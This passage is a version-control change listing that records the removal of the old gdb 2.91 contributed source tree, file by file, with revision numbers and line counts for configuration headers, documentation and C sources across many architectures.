+0 -90 src/contrib/gdb.291/gdb/config.in (dead) 1.2 +0 -9 src/contrib/gdb.291/gdb/config/alpha/alpha-linux.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/alpha/alpha-linux.mt (dead) 1.2 +0 -5 src/contrib/gdb.291/gdb/config/alpha/alpha-osf1.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/alpha/alpha-osf1.mt (dead) 1.2 +0 -5 src/contrib/gdb.291/gdb/config/alpha/alpha-osf2.mh (dead) 1.2 +0 -5 src/contrib/gdb.291/gdb/config/alpha/alpha-osf3.mh (dead) 1.2 +0 -66 src/contrib/gdb.291/gdb/config/alpha/nm-linux.h (dead) 1.2 +0 -56 src/contrib/gdb.291/gdb/config/alpha/nm-osf.h (dead) 1.2 +0 -54 src/contrib/gdb.291/gdb/config/alpha/nm-osf2.h (dead) 1.2 +0 -26 src/contrib/gdb.291/gdb/config/alpha/nm-osf3.h (dead) 1.3 +0 -481 src/contrib/gdb.291/gdb/config/alpha/tm-alpha.h (dead) 1.2 +0 -80 src/contrib/gdb.291/gdb/config/alpha/tm-alphalinux.h (dead) 1.2 +0 -29 src/contrib/gdb.291/gdb/config/alpha/xm-alphalinux.h (dead) 1.2 +0 -27 src/contrib/gdb.291/gdb/config/alpha/xm-alphaosf.h (dead) 1.2 +0 -5 src/contrib/gdb.291/gdb/config/arm/arm.mh (dead) 1.2 +0 -6 src/contrib/gdb.291/gdb/config/arm/arm.mt (dead) 1.2 +0 -27 src/contrib/gdb.291/gdb/config/arm/nm-arm.h (dead) 1.2 +0 -453 src/contrib/gdb.291/gdb/config/arm/tm-arm.h (dead) 1.2 +0 -76 src/contrib/gdb.291/gdb/config/arm/xm-arm.h (dead) 1.2 +0 -6 src/contrib/gdb.291/gdb/config/i386/cygwin.mh (dead) 1.2 +0 -6 src/contrib/gdb.291/gdb/config/i386/cygwin.mt (dead) 1.2 +0 -6 src/contrib/gdb.291/gdb/config/i386/cygwin32.mh (dead) 1.2 +0 -6 src/contrib/gdb.291/gdb/config/i386/cygwin32.mt (dead) 1.2 +0 -5 src/contrib/gdb.291/gdb/config/i386/fbsd.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/i386/fbsd.mt (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/i386/gdbserve.mt (dead) 1.2 +0 -9 src/contrib/gdb.291/gdb/config/i386/go32.mh (dead) 1.2 +0 -12 src/contrib/gdb.291/gdb/config/i386/i386aix.mh (dead) 1.2 +0 -7 src/contrib/gdb.291/gdb/config/i386/i386aix.mt (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/i386/i386aout.mt (dead) 1.2 +0 -7 src/contrib/gdb.291/gdb/config/i386/i386bsd.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/i386/i386bsd.mt (dead) 1.2 +0 -14 src/contrib/gdb.291/gdb/config/i386/i386dgux.mh (dead) 1.2 +0 -36 src/contrib/gdb.291/gdb/config/i386/i386gnu.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/i386/i386gnu.mt (dead) 1.2 +0 -11 src/contrib/gdb.291/gdb/config/i386/i386lynx.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/i386/i386lynx.mt (dead) 1.2 +0 -11 src/contrib/gdb.291/gdb/config/i386/i386m3.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/i386/i386m3.mt (dead) 1.2 +0 -10 src/contrib/gdb.291/gdb/config/i386/i386mach.mh (dead) 1.2 +0 -8 src/contrib/gdb.291/gdb/config/i386/i386mk.mh (dead) 1.2 +0 -6 src/contrib/gdb.291/gdb/config/i386/i386mk.mt (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/i386/i386nw.mt (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/i386/i386os9k.mt (dead) 1.2 +0 -13 src/contrib/gdb.291/gdb/config/i386/i386sco.mh (dead) 1.2 +0 -12 src/contrib/gdb.291/gdb/config/i386/i386sco4.mh (dead) 1.2 +0 -17 src/contrib/gdb.291/gdb/config/i386/i386sco5.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/i386/i386sco5.mt (dead) 1.2 +0 -12 src/contrib/gdb.291/gdb/config/i386/i386sol2.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/i386/i386sol2.mt (dead) 1.2 +0 -8 src/contrib/gdb.291/gdb/config/i386/i386v.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/i386/i386v.mt (dead) 1.2 +0 -9 src/contrib/gdb.291/gdb/config/i386/i386v32.mh (dead) 1.2 +0 -14 src/contrib/gdb.291/gdb/config/i386/i386v4.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/i386/i386v4.mt (dead) 1.2 +0 -11 src/contrib/gdb.291/gdb/config/i386/i386v42mp.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/i386/i386v42mp.mt (dead) 1.2 +0 -13 src/contrib/gdb.291/gdb/config/i386/linux.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/i386/linux.mt (dead) 1.2 +0 -5 src/contrib/gdb.291/gdb/config/i386/nbsd.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/i386/nbsd.mt (dead) 1.2 +0 -21 src/contrib/gdb.291/gdb/config/i386/ncr3000.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/i386/ncr3000.mt (dead) 1.2 +0 -101 src/contrib/gdb.291/gdb/config/i386/nm-fbsd.h (dead) 1.2 +0 -22 src/contrib/gdb.291/gdb/config/i386/nm-gnu.h (dead) 1.2 +0 -42 src/contrib/gdb.291/gdb/config/i386/nm-i386aix.h (dead) 1.2 +0 -39 src/contrib/gdb.291/gdb/config/i386/nm-i386bsd.h (dead) 1.2 +0 -25 src/contrib/gdb.291/gdb/config/i386/nm-i386lynx.h (dead) 1.2 +0 -26 src/contrib/gdb.291/gdb/config/i386/nm-i386mach.h (dead) 1.2 +0 -47 src/contrib/gdb.291/gdb/config/i386/nm-i386sco.h (dead) 1.2 +0 -32 src/contrib/gdb.291/gdb/config/i386/nm-i386sco4.h (dead) 1.2 +0 -41 src/contrib/gdb.291/gdb/config/i386/nm-i386sco5.h (dead) 1.2 +0 -35 src/contrib/gdb.291/gdb/config/i386/nm-i386sol2.h (dead) 1.2 +0 -38 src/contrib/gdb.291/gdb/config/i386/nm-i386v.h (dead) 1.2 +0 -21 src/contrib/gdb.291/gdb/config/i386/nm-i386v4.h (dead) 1.2 +0 -22 src/contrib/gdb.291/gdb/config/i386/nm-i386v42mp.h (dead) 1.2 +0 -82 src/contrib/gdb.291/gdb/config/i386/nm-linux.h (dead) 1.2 +0 -22 src/contrib/gdb.291/gdb/config/i386/nm-m3.h (dead) 1.2 +0 -34 src/contrib/gdb.291/gdb/config/i386/nm-nbsd.h (dead) 1.2 +0 -62 src/contrib/gdb.291/gdb/config/i386/nm-ptx4.h (dead) 1.2 +0 -27 src/contrib/gdb.291/gdb/config/i386/nm-sun386.h (dead) 1.2 +0 -47 src/contrib/gdb.291/gdb/config/i386/nm-symmetry.h (dead) 1.2 +0 -7 src/contrib/gdb.291/gdb/config/i386/ptx.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/i386/ptx.mt (dead) 1.2 +0 -7 src/contrib/gdb.291/gdb/config/i386/ptx4.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/i386/ptx4.mt (dead) 1.2 +0 -5 src/contrib/gdb.291/gdb/config/i386/sun386.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/i386/sun386.mt (dead) 1.2 +0 -5 src/contrib/gdb.291/gdb/config/i386/symmetry.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/i386/symmetry.mt (dead) 1.2 +0 -127 src/contrib/gdb.291/gdb/config/i386/tm-cygwin.h (dead) 1.2 +0 -125 src/contrib/gdb.291/gdb/config/i386/tm-cygwin32.h (dead) 1.2 +0 -32 src/contrib/gdb.291/gdb/config/i386/tm-fbsd.h (dead) 1.2 +0 -309 src/contrib/gdb.291/gdb/config/i386/tm-i386.h (dead) 1.2 +0 -67 src/contrib/gdb.291/gdb/config/i386/tm-i386aix.h (dead) 1.2 +0 -43 src/contrib/gdb.291/gdb/config/i386/tm-i386bsd.h (dead) 1.2 +0 -48 src/contrib/gdb.291/gdb/config/i386/tm-i386gnu.h (dead) 1.2 +0 -33 src/contrib/gdb.291/gdb/config/i386/tm-i386lynx.h (dead) 1.2 +0 -60 src/contrib/gdb.291/gdb/config/i386/tm-i386m3.h (dead) 1.2 +0 -25 src/contrib/gdb.291/gdb/config/i386/tm-i386mk.h (dead) 1.2 +0 -49 src/contrib/gdb.291/gdb/config/i386/tm-i386nw.h (dead) 1.2 +0 -63 src/contrib/gdb.291/gdb/config/i386/tm-i386os9k.h (dead) 1.2 +0 -62 src/contrib/gdb.291/gdb/config/i386/tm-i386sco5.h (dead) 1.2 +0 -64 src/contrib/gdb.291/gdb/config/i386/tm-i386sol2.h (dead) 1.2 +0 -161 src/contrib/gdb.291/gdb/config/i386/tm-i386v.h (dead) 1.2 +0 -78 src/contrib/gdb.291/gdb/config/i386/tm-i386v4.h (dead) 1.2 +0 -44 src/contrib/gdb.291/gdb/config/i386/tm-i386v42mp.h (dead) 1.2 +0 -35 src/contrib/gdb.291/gdb/config/i386/tm-linux.h (dead) 1.2 +0 -42 src/contrib/gdb.291/gdb/config/i386/tm-nbsd.h (dead) 1.2 +0 -232 src/contrib/gdb.291/gdb/config/i386/tm-ptx.h (dead) 1.2 +0 -24 src/contrib/gdb.291/gdb/config/i386/tm-ptx4.h (dead) 1.2 +0 -205 src/contrib/gdb.291/gdb/config/i386/tm-sun386.h (dead) 1.2 +0 -321 src/contrib/gdb.291/gdb/config/i386/tm-symmetry.h (dead) 1.2 +0 -17 src/contrib/gdb.291/gdb/config/i386/windows.mh (dead) 1.2 +0 -34 src/contrib/gdb.291/gdb/config/i386/xm-cygwin.h (dead) 1.2 +0 -41 src/contrib/gdb.291/gdb/config/i386/xm-cygwin32.h (dead) 1.2 +0 -31 src/contrib/gdb.291/gdb/config/i386/xm-go32.h (dead) 1.2 +0 -33 src/contrib/gdb.291/gdb/config/i386/xm-i386aix.h (dead) 1.2 +0 -23 src/contrib/gdb.291/gdb/config/i386/xm-i386bsd.h (dead) 1.2 +0 -23 src/contrib/gdb.291/gdb/config/i386/xm-i386gnu.h (dead) 1.2 +0 -24 src/contrib/gdb.291/gdb/config/i386/xm-i386lynx.h (dead) 1.2 +0 -38 src/contrib/gdb.291/gdb/config/i386/xm-i386m3.h (dead) 1.2 +0 -35 src/contrib/gdb.291/gdb/config/i386/xm-i386mach.h (dead) 1.2 +0 -25 src/contrib/gdb.291/gdb/config/i386/xm-i386mk.h (dead) 1.2 +0 -42 src/contrib/gdb.291/gdb/config/i386/xm-i386sco.h (dead) 1.2 +0 -45 src/contrib/gdb.291/gdb/config/i386/xm-i386v.h (dead) 1.2 +0 -24 src/contrib/gdb.291/gdb/config/i386/xm-i386v32.h (dead) 1.2 +0 -37 src/contrib/gdb.291/gdb/config/i386/xm-i386v4.h (dead) 1.2 +0 -46 src/contrib/gdb.291/gdb/config/i386/xm-linux.h (dead) 1.2 +0 -21 src/contrib/gdb.291/gdb/config/i386/xm-nbsd.h (dead) 1.2 +0 -41 src/contrib/gdb.291/gdb/config/i386/xm-ptx.h (dead) 1.2 +0 -25 src/contrib/gdb.291/gdb/config/i386/xm-ptx4.h (dead) 1.2 +0 -20 src/contrib/gdb.291/gdb/config/i386/xm-sun386.h (dead) 1.2 +0 -28 src/contrib/gdb.291/gdb/config/i386/xm-symmetry.h (dead) 1.2 +0 -35 src/contrib/gdb.291/gdb/config/i386/xm-windows.h (dead) 1.2 +0 -39 src/contrib/gdb.291/gdb/config/mips/tm-tx39.h (dead) 1.2 +0 -39 src/contrib/gdb.291/gdb/config/mips/tm-tx39l.h (dead) 1.2 +0 -25 src/contrib/gdb.291/gdb/config/mips/tm-vr4100.h (dead) 1.2 +0 -23 src/contrib/gdb.291/gdb/config/mips/tm-vr5000.h (dead) 1.2 +0 -23 src/contrib/gdb.291/gdb/config/mips/tm-vr5000el.h (dead) 1.2 +0 -5 src/contrib/gdb.291/gdb/config/mips/tx39.mt (dead) 1.2 +0 -5 src/contrib/gdb.291/gdb/config/mips/tx39l.mt (dead) 1.2 +0 -5 src/contrib/gdb.291/gdb/config/mips/vr4100.mt (dead) 1.2 +0 -7 src/contrib/gdb.291/gdb/config/mips/vr5000.mt (dead) 1.2 +0 -5 src/contrib/gdb.291/gdb/config/mips/vr5000el.mt (dead) 1.2 +0 -11 src/contrib/gdb.291/gdb/config/powerpc/aix.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/powerpc/aix.mt (dead) 1.2 +0 -5 src/contrib/gdb.291/gdb/config/powerpc/cygwin.mh (dead) 1.2 +0 -6 src/contrib/gdb.291/gdb/config/powerpc/cygwin.mt (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/powerpc/gdbserve.mt (dead) 1.2 +0 -10 src/contrib/gdb.291/gdb/config/powerpc/linux.mh (dead) 1.2 +0 -4 src/contrib/gdb.291/gdb/config/powerpc/macos.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/powerpc/macos.mt (dead) 1.2 +0 -22 src/contrib/gdb.291/gdb/config/powerpc/nm-aix.h (dead) 1.2 +0 -20 src/contrib/gdb.291/gdb/config/powerpc/nm-macos.h (dead) 1.2 +0 -30 src/contrib/gdb.291/gdb/config/powerpc/nm-solaris.h (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/powerpc/ppc-eabi.mt (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/powerpc/ppc-nw.mt (dead) 1.2 +0 -6 src/contrib/gdb.291/gdb/config/powerpc/ppc-sim.mt (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/powerpc/ppcle-eabi.mt (dead) 1.2 +0 -6 src/contrib/gdb.291/gdb/config/powerpc/ppcle-sim.mt (dead) 1.2 +0 -18 src/contrib/gdb.291/gdb/config/powerpc/solaris.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/powerpc/solaris.mt (dead) 1.2 +0 -21 src/contrib/gdb.291/gdb/config/powerpc/tm-cygwin.h (dead) 1.2 +0 -26 src/contrib/gdb.291/gdb/config/powerpc/tm-macos.h (dead) 1.2 +0 -28 src/contrib/gdb.291/gdb/config/powerpc/tm-ppc-aix.h (dead) 1.2 +0 -84 src/contrib/gdb.291/gdb/config/powerpc/tm-ppc-eabi.h (dead) 1.2 +0 -31 src/contrib/gdb.291/gdb/config/powerpc/tm-ppc-nw.h (dead) 1.2 +0 -26 src/contrib/gdb.291/gdb/config/powerpc/tm-ppc-sim.h (dead) 1.2 +0 -30 src/contrib/gdb.291/gdb/config/powerpc/tm-ppcle-eabi.h (dead) 1.2 +0 -26 src/contrib/gdb.291/gdb/config/powerpc/tm-ppcle-sim.h (dead) 1.2 +0 -74 src/contrib/gdb.291/gdb/config/powerpc/tm-solaris.h (dead) 1.2 +0 -30 src/contrib/gdb.291/gdb/config/powerpc/xm-aix.h (dead) 1.2 +0 -32 src/contrib/gdb.291/gdb/config/powerpc/xm-cygwin.h (dead) 1.2 +0 -21 src/contrib/gdb.291/gdb/config/powerpc/xm-linux.h (dead) 1.2 +0 -22 src/contrib/gdb.291/gdb/config/powerpc/xm-mpw.h (dead) 1.2 +0 -21 src/contrib/gdb.291/gdb/config/powerpc/xm-solaris.h (dead) 1.2 +0 -7 src/contrib/gdb.291/gdb/config/sparc/linux.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/sparc/linux.mt (dead) 1.2 +0 -6 src/contrib/gdb.291/gdb/config/sparc/nbsd.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/sparc/nbsd.mt (dead) 1.2 +0 -31 src/contrib/gdb.291/gdb/config/sparc/nm-linux.h (dead) 1.2 +0 -57 src/contrib/gdb.291/gdb/config/sparc/nm-nbsd.h (dead) 1.2 +0 -25 src/contrib/gdb.291/gdb/config/sparc/nm-sparclynx.h (dead) 1.2 +0 -35 src/contrib/gdb.291/gdb/config/sparc/nm-sun4os4.h (dead) 1.2 +0 -45 src/contrib/gdb.291/gdb/config/sparc/nm-sun4sol2.h (dead) 1.2 +0 -9 src/contrib/gdb.291/gdb/config/sparc/sp64.mt (dead) 1.2 +0 -13 src/contrib/gdb.291/gdb/config/sparc/sp64sim.mt (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/sparc/sp64sol2.mt (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/sparc/sparc-em.mt (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/sparc/sparclet.mt (dead) 1.2 +0 -5 src/contrib/gdb.291/gdb/config/sparc/sparclite.mt (dead) 1.2 +0 -11 src/contrib/gdb.291/gdb/config/sparc/sparclynx.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/sparc/sparclynx.mt (dead) 1.2 +0 -11 src/contrib/gdb.291/gdb/config/sparc/sun4os4.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/sparc/sun4os4.mt (dead) 1.2 +0 -18 src/contrib/gdb.291/gdb/config/sparc/sun4sol2.mh (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/sparc/sun4sol2.mt (dead) 1.2 +0 -29 src/contrib/gdb.291/gdb/config/sparc/tm-linux.h (dead) 1.2 +0 -27 src/contrib/gdb.291/gdb/config/sparc/tm-nbsd.h (dead) 1.2 +0 -378 src/contrib/gdb.291/gdb/config/sparc/tm-sp64.h (dead) 1.2 +0 -50 src/contrib/gdb.291/gdb/config/sparc/tm-sp64sim.h (dead) 1.2 +0 -584 src/contrib/gdb.291/gdb/config/sparc/tm-sparc.h (dead) 1.2 +0 -132 src/contrib/gdb.291/gdb/config/sparc/tm-sparclet.h (dead) 1.2 +0 -98 src/contrib/gdb.291/gdb/config/sparc/tm-sparclite.h (dead) 1.2 +0 -36 src/contrib/gdb.291/gdb/config/sparc/tm-sparclynx.h (dead) 1.2 +0 -46 src/contrib/gdb.291/gdb/config/sparc/tm-spc-em.h (dead) 1.2 +0 -58 src/contrib/gdb.291/gdb/config/sparc/tm-sun4os4.h (dead) 1.2 +0 -94 src/contrib/gdb.291/gdb/config/sparc/tm-sun4sol2.h (dead) 1.2 +0 -36 src/contrib/gdb.291/gdb/config/sparc/tm-vxsparc.h (dead) 1.2 +0 -3 src/contrib/gdb.291/gdb/config/sparc/vxsparc.mt (dead) 1.2 +0 -48 src/contrib/gdb.291/gdb/config/sparc/xm-linux.h (dead) 1.2 +0 -21 src/contrib/gdb.291/gdb/config/sparc/xm-nbsd.h (dead) 1.2 +0 -22 src/contrib/gdb.291/gdb/config/sparc/xm-sparc.h (dead) 1.2 +0 -24 src/contrib/gdb.291/gdb/config/sparc/xm-sparclynx.h (dead) 1.2 +0 -34 src/contrib/gdb.291/gdb/config/sparc/xm-sun4os4.h (dead) 1.2 +0 -49 src/contrib/gdb.291/gdb/config/sparc/xm-sun4sol2.h (dead) 1.2 +0 -2745 src/contrib/gdb.291/gdb/configure (dead) 1.2 +0 -162 src/contrib/gdb.291/gdb/configure.host (dead) 1.2 +0 -615 src/contrib/gdb.291/gdb/configure.in (dead) 1.2 +0 -282 src/contrib/gdb.291/gdb/configure.tgt (dead) 1.2 +0 -77 src/contrib/gdb.291/gdb/copying.awk (dead) 1.2 +0 -327 src/contrib/gdb.291/gdb/copying.c (dead) 1.5 +0 -146 src/contrib/gdb.291/gdb/core-aout.c (dead) 1.5 +0 -134 src/contrib/gdb.291/gdb/core-regset.c (dead) 1.2 +0 -339 src/contrib/gdb.291/gdb/corefile.c (dead) 1.2 +0 -419 src/contrib/gdb.291/gdb/corelow.c (dead) 1.2 +0 -600 src/contrib/gdb.291/gdb/cp-valprint.c (dead) 1.2 +0 -1028 src/contrib/gdb.291/gdb/d10v-tdep.c (dead) 1.2 +0 -1396 src/contrib/gdb.291/gdb/d30v-tdep.c (dead) 1.2 +0 -164 src/contrib/gdb.291/gdb/dbug-rom.c (dead) 1.5 +0 -2752 src/contrib/gdb.291/gdb/dbxread.c (dead) 1.2 +0 -564 src/contrib/gdb.291/gdb/dcache.c (dead) 1.2 +0 -50 src/contrib/gdb.291/gdb/dcache.h (dead) 1.2 +0 -109 src/contrib/gdb.291/gdb/debugify.c (dead) 1.2 +0 -83 src/contrib/gdb.291/gdb/debugify.h (dead) 1.4 +0 -1146 src/contrib/gdb.291/gdb/defs.h (dead) 1.3 +0 -239 src/contrib/gdb.291/gdb/demangle.c (dead) 1.2 +0 -198 src/contrib/gdb.291/gdb/dink32-rom.c (dead) 1.2 +0 -1206 src/contrib/gdb.291/gdb/doc/ChangeLog (dead) 1.2 +0 -1 src/contrib/gdb.291/gdb/doc/GDBvn.texi (dead) 1.2 +0 -114 src/contrib/gdb.291/gdb/doc/HPPA-cfg.texi (dead) 1.2 +0 -197 src/contrib/gdb.291/gdb/doc/LRS (dead) 1.2 +0 -331 src/contrib/gdb.291/gdb/doc/Makefile.in (dead) 1.2 +0 -11 src/contrib/gdb.291/gdb/doc/a4rc.sed (dead) 1.2 +0 -839 src/contrib/gdb.291/gdb/doc/agentexpr.texi (dead) 1.2 +0 -120 src/contrib/gdb.291/gdb/doc/all-cfg.texi (dead) 1.2 +0 -717 src/contrib/gdb.291/gdb/doc/annotate.texi (dead) 1.2 +0 -862 src/contrib/gdb.291/gdb/doc/configure (dead) 1.2 +0 -7 src/contrib/gdb.291/gdb/doc/configure.in (dead) 1.4 +0 -10316 src/contrib/gdb.291/gdb/doc/gdb.texinfo (dead) 1.2 +0 -2543 src/contrib/gdb.291/gdb/doc/gdbint.texinfo (dead) 1.2 +0 -47 src/contrib/gdb.291/gdb/doc/h8-cfg.texi (dead) 1.2 +0 -878 src/contrib/gdb.291/gdb/doc/libgdb.texinfo (dead) 1.2 +0 -13 src/contrib/gdb.291/gdb/doc/lpsrc.sed (dead) 1.2 +0 -13 src/contrib/gdb.291/gdb/doc/psrc.sed (dead) 1.2 +0 -645 src/contrib/gdb.291/gdb/doc/refcard.tex (dead) 1.2 +0 -1531 src/contrib/gdb.291/gdb/doc/remote.texi (dead) 1.4 +0 -4019 src/contrib/gdb.291/gdb/doc/stabs.texinfo (dead) 1.2 +0 -962 src/contrib/gdb.291/gdb/dve3900-rom.c (dead) 1.2 +0 -5865 src/contrib/gdb.291/gdb/dwarf2read.c (dead) 1.2 +0 -3883 src/contrib/gdb.291/gdb/dwarfread.c (dead) 1.2 +0 -826 src/contrib/gdb.291/gdb/elfread.c (dead) 1.2 +0 -194 src/contrib/gdb.291/gdb/environ.c (dead) 1.2 +0 -58 src/contrib/gdb.291/gdb/environ.h (dead) 1.2 +0 -1780 src/contrib/gdb.291/gdb/eval.c (dead) 1.2 +0 -51 src/contrib/gdb.291/gdb/exc_request.defs (dead) 1.4 +0 -763 src/contrib/gdb.291/gdb/exec.c (dead) 1.2 +0 -634 src/contrib/gdb.291/gdb/expprint.c (dead) 1.2 +0 -386 src/contrib/gdb.291/gdb/expression.h (dead) 1.2 +0 -1170 src/contrib/gdb.291/gdb/f-exp.y (dead) 1.2 +0 -944 src/contrib/gdb.291/gdb/f-lang.c (dead) 1.2 +0 -94 src/contrib/gdb.291/gdb/f-lang.h (dead) 1.2 +0 -454 src/contrib/gdb.291/gdb/f-typeprint.c (dead) 1.2 +0 -748 src/contrib/gdb.291/gdb/f-valprint.c (dead) 1.2 +0 -1444 src/contrib/gdb.291/gdb/findvar.c (dead) 1.2 +0 -309 src/contrib/gdb.291/gdb/fork-child.c (dead) 1.2 +0 -552 src/contrib/gdb.291/gdb/fr30-tdep.c (dead) 1.2 +0 -196 src/contrib/gdb.291/gdb/frame.h (dead) 1.2 +0 -78 src/contrib/gdb.291/gdb/gdb-stabs.h (dead) 1.2 +0 -371 src/contrib/gdb.291/gdb/gdb.1 (dead) 1.2 +0 -35 src/contrib/gdb.291/gdb/gdb.gdb (dead) 1.2 +0 -68 src/contrib/gdb.291/gdb/gdb_stat.h (dead) 1.2 +0 -48 src/contrib/gdb.291/gdb/gdb_string.h (dead) 1.2 +0 -2607 src/contrib/gdb.291/gdb/gdba.el (dead) 1.2 +0 -360 src/contrib/gdb.291/gdb/gdbarch.c (dead) 1.2 +0 -118 src/contrib/gdb.291/gdb/gdbarch.h (dead) 1.2 +0 -106 src/contrib/gdb.291/gdb/gdbcmd.h (dead) 1.2 +0 -155 src/contrib/gdb.291/gdb/gdbcore.h (dead) 1.2 +0 -18 src/contrib/gdb.291/gdb/gdbinit.in (dead) 1.2 +0 -245 src/contrib/gdb.291/gdb/gdbserver/Makefile.in (dead) 1.2 +0 -127 src/contrib/gdb.291/gdb/gdbserver/README (dead) 1.2 +0 -335 src/contrib/gdb.291/gdb/gdbserver/configure.in (dead) 1.4 +0 -317 src/contrib/gdb.291/gdb/gdbserver/gdbreplay.c (dead) 1.2 +0 -103 src/contrib/gdb.291/gdb/gdbserver/gdbserver.1 (dead) 1.2 +0 -379 src/contrib/gdb.291/gdb/gdbserver/low-hppabsd.c (dead) 1.2 +0 -420 src/contrib/gdb.291/gdb/gdbserver/low-linux.c (dead) 1.2 +0 -746 src/contrib/gdb.291/gdb/gdbserver/low-lynx.c (dead) 1.2 +0 -289 src/contrib/gdb.291/gdb/gdbserver/low-sim.c (dead) 1.2 +0 -334 src/contrib/gdb.291/gdb/gdbserver/low-sparc.c (dead) 1.2 +0 -313 src/contrib/gdb.291/gdb/gdbserver/low-sun3.c (dead) 1.2 +0 -479 src/contrib/gdb.291/gdb/gdbserver/remote-utils.c (dead) 1.2 +0 -249 src/contrib/gdb.291/gdb/gdbserver/server.c (dead) 1.2 +0 -50 src/contrib/gdb.291/gdb/gdbserver/server.h (dead) 1.4 +0 -111 src/contrib/gdb.291/gdb/gdbserver/utils.c (dead) 1.2 +0 -121 src/contrib/gdb.291/gdb/gdbthread.h (dead) 1.2 +0 -1683 src/contrib/gdb.291/gdb/gdbtypes.c (dead) 1.2 +0 -789 src/contrib/gdb.291/gdb/gdbtypes.h (dead) 1.2 +0 -1759 src/contrib/gdb.291/gdb/gnu-regex.c (dead) 1.2 +0 -181 src/contrib/gdb.291/gdb/gnu-regex.h (dead) 1.2 +0 -2381 src/contrib/gdb.291/gdb/hp-psymtab-read.c (dead) 1.2 +0 -3988 src/contrib/gdb.291/gdb/hp-symtab-read.c (dead) 1.2 +0 -150 src/contrib/gdb.291/gdb/hpread.h (dead) 1.2 +0 -641 src/contrib/gdb.291/gdb/hpux-thread.c (dead) 1.3 +0 -799 src/contrib/gdb.291/gdb/i386-tdep.c (dead) 1.5 +0 -359 src/contrib/gdb.291/gdb/i386b-nat.c (dead) 1.2 +0 -107 src/contrib/gdb.291/gdb/i387-tdep.c (dead) 1.2 +0 -1375 src/contrib/gdb.291/gdb/infcmd.c (dead) 1.2 +0 -382 src/contrib/gdb.291/gdb/inferior.h (dead) 1.2 +0 -718 src/contrib/gdb.291/gdb/inflow.c (dead) 1.4 +0 -637 src/contrib/gdb.291/gdb/infptrace.c (dead) 1.2 +0 -2224 src/contrib/gdb.291/gdb/infrun.c (dead) 1.2 +0 -390 src/contrib/gdb.291/gdb/inftarg.c (dead) 1.2 +0 -5674 src/contrib/gdb.291/gdb/infttrace.c (dead) 1.2 +0 -2351 src/contrib/gdb.291/gdb/jv-exp.tab.c (dead) 1.2 +0 -1466 src/contrib/gdb.291/gdb/jv-exp.y (dead) 1.2 +0 -1088 src/contrib/gdb.291/gdb/jv-lang.c (dead) 1.2 +0 -67 src/contrib/gdb.291/gdb/jv-lang.h (dead) 1.2 +0 -339 src/contrib/gdb.291/gdb/jv-typeprint.c (dead) 1.2 +0 -526 src/contrib/gdb.291/gdb/jv-valprint.c (dead) 1.2 +0 -1400 src/contrib/gdb.291/gdb/language.c (dead) 1.2 +0 -431 src/contrib/gdb.291/gdb/language.h (dead) 1.2 +0 -1094 src/contrib/gdb.291/gdb/m2-exp.y (dead) 1.2 +0 -465 src/contrib/gdb.291/gdb/m2-lang.c (dead) 1.2 +0 -31 src/contrib/gdb.291/gdb/m2-lang.h (dead) 1.2 +0 -49 src/contrib/gdb.291/gdb/m2-typeprint.c (dead) 1.2 +0 -45 src/contrib/gdb.291/gdb/m2-valprint.c (dead) 1.2 +0 -650 src/contrib/gdb.291/gdb/m32r-rom.c (dead) 1.2 +0 -1685 src/contrib/gdb.291/gdb/m32r-stub.c (dead) 1.2 +0 -745 src/contrib/gdb.291/gdb/m32r-tdep.c (dead) 1.2 +0 -155 src/contrib/gdb.291/gdb/m68klinux-nat.c (dead) 1.3 +0 -781 src/contrib/gdb.291/gdb/main.c (dead) 1.2 +0 -370 src/contrib/gdb.291/gdb/maint.c (dead) 1.2 +0 -4368 src/contrib/gdb.291/gdb/mdebugread.c (dead) 1.2 +0 -121 src/contrib/gdb.291/gdb/mem-break.c (dead) 1.2 +0 -855 src/contrib/gdb.291/gdb/minsyms.c (dead) 1.2 +0 -477 src/contrib/gdb.291/gdb/mipsread.c (dead) 1.2 +0 -919 src/contrib/gdb.291/gdb/mn10200-tdep.c (dead) 1.2 +0 -791 src/contrib/gdb.291/gdb/mn10300-tdep.c (dead) 1.2 +0 -1 src/contrib/gdb.291/gdb/msg.defs (dead) 1.2 +0 -1 src/contrib/gdb.291/gdb/msg_reply.defs (dead) 1.2 +0 -173 src/contrib/gdb.291/gdb/nlm/Makefile.in (dead) 1.2 +0 -864 